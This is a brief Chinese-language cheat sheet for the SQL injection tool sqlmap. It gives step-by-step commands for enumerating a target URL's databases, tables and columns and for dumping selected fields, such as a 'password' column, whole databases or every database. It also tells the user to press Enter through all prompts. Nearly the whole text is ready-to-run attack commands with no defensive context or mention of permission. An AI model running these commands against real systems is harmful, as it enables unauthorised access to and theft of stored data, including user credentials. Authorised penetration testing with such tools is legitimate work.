sqlmap注入检测

1、列出可利用数据库：

 

sqlmap  -u  url  --dbs

 

 

2、列出某个数据库中表：

 

sqlmap  -u  url   --tables  -D  south

 

 

sqlmap  -u  url  --dump   -T   t_users   -D   south

 

 

3、列出某个数据库中某个表的字段：

 

sqlmap  -u  url   --columns  -T  member  -D  south

 

 

4、列出某个数据库中某个表的某个字段：

 

sqlmap  -u  url   --dump  -C  id  -T  member  -D  south

 

 

sqlmap  -u  url   --dump  -C  password  -T  member  -D  south

 

 

5、复制某个数据库：

 

sqlmap  -u  url   --dump  –D  south

 

 

 

遇到问题，一路回车

 

6、复制全部数据库：

 

sqlmap   -u  url   --dump-all

 

与5同理

 

遇到问题，一路回车

 

PS：-D：数据库，-T：数据库中表，-C：数据库中表的字段，--dump：复制